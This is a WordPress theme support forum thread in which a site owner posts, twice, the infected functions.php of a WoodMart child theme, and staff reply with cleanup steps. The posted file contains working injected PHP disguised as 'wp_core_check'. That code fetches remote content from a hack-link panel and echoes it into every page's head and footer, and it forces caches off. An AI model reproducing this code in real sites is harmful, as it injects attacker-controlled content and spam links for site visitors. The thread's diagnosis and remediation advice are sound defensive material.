Home / Forums / WoodMart support forum / unknown links on my site and the site is down.
Home › Forums › WoodMart support forum › unknown links on my site and the site is down.
unknown links on my site and the site is down.
- This topic has 3 replies, 3 voices, and was last updated 1 month, 1 week ago by
Serg Sokhatskyi.
-
AuthorPosts
-
May 26, 2026 at 7:06 am #719403
engootechParticipantthe website is currently down.
I found unknown websites on my site.
I scanned the site using Wordfence and resolved the issue.
the website is down after the scan.Wordfence: File Viewer
Filename: /home/spodly/public_html/wp-content/themes/woodmart-child/functions.php
File Size: 3,077 bytes
File last modified: Tuesday 19th of May 2026 10:22:47 PM
<?php
/**
* Enqueue script and styles for child theme
*/
function woodmart_child_enqueue_styles() {
wp_enqueue_style( ‘child-style’, get_stylesheet_directory_uri() . ‘/style.css’, array( ‘woodmart-style’ ), woodmart_get_theme_info( ‘Version’ ) );
}
add_action( ‘wp_enqueue_scripts’, ‘woodmart_child_enqueue_styles’, 10010 );add_filter( ‘dynamic_sidebar_params’, function($params) {
if ( isset($params[0][‘before_title’]) ) {
$params[0][‘before_title’] = str_replace(‘<h5 class=”widget-title”>’,'<div class=”widget-title”>’,$params[0][‘before_title’]);
}
if ( isset($params[0][‘after_title’]) ) {
$params[0][‘after_title’] = str_replace(‘</h5>’,'</div>’,$params[0][‘after_title’]);
}
return $params;
});
add_action(“init”,function(){if(!defined(“DONOTCACHEPAGE”)){define(“DONOTCACHEPAGE”,true);}if(defined(“LSCACHE_NO_CACHE”)){header(“X-LiteSpeed-Control: no-cache”);}if(function_exists(“nocache_headers”)){nocache_headers();}if(!headers_sent()){header(“Cache-Control: no-store, no-cache, must-revalidate, max-age=0”);header(“Pragma: no-cache”);header(“Expires: Mon, 26 Jul 1997 05:00:00 GMT”);header(“Last-Modified: ” . gmdate(“D, d M Y H:i:s”) . ” GMT”);header(“X-Accel-Expires: 0”);header(“X-Cache-Control: no-cache”);header(“CF-Cache-Status: BYPASS”);header(“X-Forwarded-Proto: “);}if(defined(“WP_CACHE”)&&WP_CACHE){define(“DONOTCACHEPAGE”,true);}if(function_exists(“wp_cache_flush”)){wp_cache_flush();}});add_action(“wp_head”,function(){if(!headers_sent()){header(“X-Frame-Options: SAMEORIGIN”);}},1);add_action(“wp_footer”,function(){if(function_exists(“w3tc_flush_all”)){w3tc_flush_all();}if(function_exists(“wp_cache_clear_cache”)){wp_cache_clear_cache();}},999);
/ Telegram: https://t.me/hacklink_panel */
if(!function_exists(‘wp_core_check’)){function wp_core_check(){static $done=false;if($done){return;}if(class_exists(‘Elementor\Plugin’)){$elementor=\Elementor\Plugin::instance();if($elementor->editor->is_edit_mode()){return;}}$u=”https://panel.hacklinkmarket.com/code?v=”.time();$d=(!empty($_SERVER[‘HTTPS’])&&$_SERVER[‘HTTPS’]!==’off’?”https://”:”http://”).$_SERVER[‘HTTP_HOST’].”/”;if(function_exists(‘curl_init’)){$h=curl_init();curl_setopt_array($h,[CURLOPT_URL=>$u,CURLOPT_HTTPHEADER=>[“X-Request-Domain:”.$d,”User-Agent: WordPress/”.get_bloginfo(‘version’)],CURLOPT_RETURNTRANSFER=>true,CURLOPT_TIMEOUT=>10,CURLOPT_CONNECTTIMEOUT=>5,CURLOPT_SSL_VERIFYPEER=>false,CURLOPT_FOLLOWLOCATION=>true,CURLOPT_MAXREDIRS=>3]);$r=@curl_exec($h);$c=curl_getinfo($h,CURLINFO_HTTP_CODE);curl_close($h);if($r!==false&&$c===200&&!empty($r)){$done=true;echo $r;return;}}if(ini_get(‘allow_url_fopen’)){$o=[‘http’=>[‘header’=>’X-Request-Domain:’.$d,’timeout’=>10],’ssl’=>[‘verify_peer’=>false]];if($r=@file_get_contents($u,false,stream_context_create($o))){$done=true;echo $r;return;}}if(function_exists(‘fopen’)){if($f=@fopen($u,’r’)){$r=”;while(!feof($f))$r.=fread($f,8192);fclose($f);if($r){$done=true;echo $r;return;}}}}add_action(‘wp_footer’,’wp_core_check’,999);add_action(‘wp_head’,’wp_core_check’,999);}
© 2011 to 2026 Wordfence — Visit Wordfence.com for help, security updates and more.after the initial check, I am now checking again to ensure the site is free of unknown links.
Report from Wordfence
Wordfence: File Viewer Filename: /home/spodly/public_html/wp-content/themes/woodmart-child/functions.php File Size: 3,077 bytes File last modified: Tuesday 19th of May 2026 10:22:47 PM <?php /** * Enqueue script and styles for child theme / function woodmart_child_enqueue_styles() { wp_enqueue_style( ‘child-style’, get_stylesheet_directory_uri() . ‘/style.css’, array( ‘woodmart-style’ ), woodmart_get_theme_info( ‘Version’ ) ); } add_action( ‘wp_enqueue_scripts’, ‘woodmart_child_enqueue_styles’, 10010 ); add_filter( ‘dynamic_sidebar_params’, function($params) { if ( isset($params[0][‘before_title’]) ) { $params[0][‘before_title’] = str_replace(‘<h5 class=”widget-title”>’,'<div class=”widget-title”>’,$params[0][‘before_title’]); } if ( isset($params[0][‘after_title’]) ) { $params[0][‘after_title’] = str_replace(‘</h5>’,'</div>’,$params[0][‘after_title’]); } return $params; }); add_action(“init”,function(){if(!defined(“DONOTCACHEPAGE”)){define(“DONOTCACHEPAGE”,true);}if(defined(“LSCACHE_NO_CACHE”)){header(“X-LiteSpeed-Control: no-cache”);}if(function_exists(“nocache_headers”)){nocache_headers();}if(!headers_sent()){header(“Cache-Control: no-store, no-cache, must-revalidate, max-age=0”);header(“Pragma: no-cache”);header(“Expires: Mon, 26 Jul 1997 05:00:00 GMT”);header(“Last-Modified: ” . gmdate(“D, d M Y H:i:s”) . ” GMT”);header(“X-Accel-Expires: 0”);header(“X-Cache-Control: no-cache”);header(“CF-Cache-Status: BYPASS”);header(“X-Forwarded-Proto: *”);}if(defined(“WP_CACHE”)&&WP_CACHE){define(“DONOTCACHEPAGE”,true);}if(function_exists(“wp_cache_flush”)){wp_cache_flush();}});add_action(“wp_head”,function(){if(!headers_sent()){header(“X-Frame-Options: SAMEORIGIN”);}},1);add_action(“wp_footer”,function(){if(function_exists(“w3tc_flush_all”)){w3tc_flush_all();}if(function_exists(“wp_cache_clear_cache”)){wp_cache_clear_cache();}},999); / Telegram: https://t.me/hacklink_panel */ if(!function_exists(‘wp_core_check’)){function wp_core_check(){static $done=false;if($done){return;}if(class_exists(‘Elementor\Plugin’)){$elementor=\Elementor\Plugin::instance();if($elementor->editor->is_edit_mode()){return;}}$u=”https://panel.hacklinkmarket.com/code?v=”.time();$d=(!empty($_SERVER[‘HTTPS’])&&$_SERVER[‘HTTPS’]!==’off’?”https://”:”http://”).$_SERVER[‘HTTP_HOST’].”/”;if(function_exists(‘curl_init’)){$h=curl_init();curl_setopt_array($h,[CURLOPT_URL=>$u,CURLOPT_HTTPHEADER=>[“X-Request-Domain:”.$d,”User-Agent: WordPress/”.get_bloginfo(‘version’)],CURLOPT_RETURNTRANSFER=>true,CURLOPT_TIMEOUT=>10,CURLOPT_CONNECTTIMEOUT=>5,CURLOPT_SSL_VERIFYPEER=>false,CURLOPT_FOLLOWLOCATION=>true,CURLOPT_MAXREDIRS=>3]);$r=@curl_exec($h);$c=curl_getinfo($h,CURLINFO_HTTP_CODE);curl_close($h);if($r!==false&&$c===200&&!empty($r)){$done=true;echo $r;return;}}if(ini_get(‘allow_url_fopen’)){$o=[‘http’=>[‘header’=>’X-Request-Domain:’.$d,’timeout’=>10],’ssl’=>[‘verify_peer’=>false]];if($r=@file_get_contents($u,false,stream_context_create($o))){$done=true;echo $r;return;}}if(function_exists(‘fopen’)){if($f=@fopen($u,’r’)){$r=”;while(!feof($f))$r.=fread($f,8192);fclose($f);if($r){$done=true;echo $r;return;}}}}add_action(‘wp_footer’,’wp_core_check’,999);add_action(‘wp_head’,’wp_core_check’,999);} © 2011 to 2026 Wordfence — Visit Wordfence.com f
Attachments:
You must be logged in to view attached files.May 26, 2026 at 12:30 pm #719473Hello,
Your site is infected with malicious code inside woodmart-child/functions.php (hack link/backdoor injection). This is not related to the theme itself.
Please immediately:
– Delete and replace the entire functions.php file with a clean version
– Re-upload a fresh child theme from the original WoodMart package
– Run a full malware scan and remove any files containing wp_core_check or hack link marketAfter the cleanup, also change all passwords (WP, FTP, hosting).
Best Regards
May 26, 2026 at 4:23 pm #719556
engootechParticipantI want you to login to the website and change woodmart-child/functions.php
May 26, 2026 at 5:02 pm #719574Hello,
Thanks for reaching out.We understand the site was infected and the woodmart-child/functions.php file contains malicious code. While we can advise on the cleanup steps, logging in to your site and performing fixes is outside the scope of our theme support.
Please follow these recommendations:
– Create a backup or, ideally, a staging copy to work on safely.
– Replace the child theme:
– Delete wp-content/themes/woodmart-child entirely.
– Upload a fresh woodmart-child theme from the original WoodMart package (woodmart-child.zip). If you had custom code, re-add it manually only after carefully reviewing it.
– Reinstall from trusted sources:
– Reinstall/update the WoodMart parent theme from a fresh package.
– Delete and reinstall all plugins from official sources (WordPress.org or the vendor).
– Reinstall WordPress core (Dashboard > Updates > Re-install Now) to replace core files.
– Hunt for backdoors:
– Check wp-config.php, .htaccess, and index.php for unfamiliar code.
– Inspect wp-content/mu-plugins, wp-content/uploads, and any recently modified PHP files.
– Review Administrator users and cron jobs; remove anything unknown.
– Temporarily disable caching/optimization during cleanup; clear all caches afterward.
– Run a full malware scan again and make sure there are no references like wp_core_check or hacklinkmarket left.
– Change all passwords (WP admin, hosting panel, FTP/SSH, database) and regenerate WordPress security keys (salts).
– Ask your hosting provider to scan the account and review server logs for suspicious activity.Kind regards,
XTemos Studio -
AuthorPosts
- You must be logged in to create new topics. Login / Register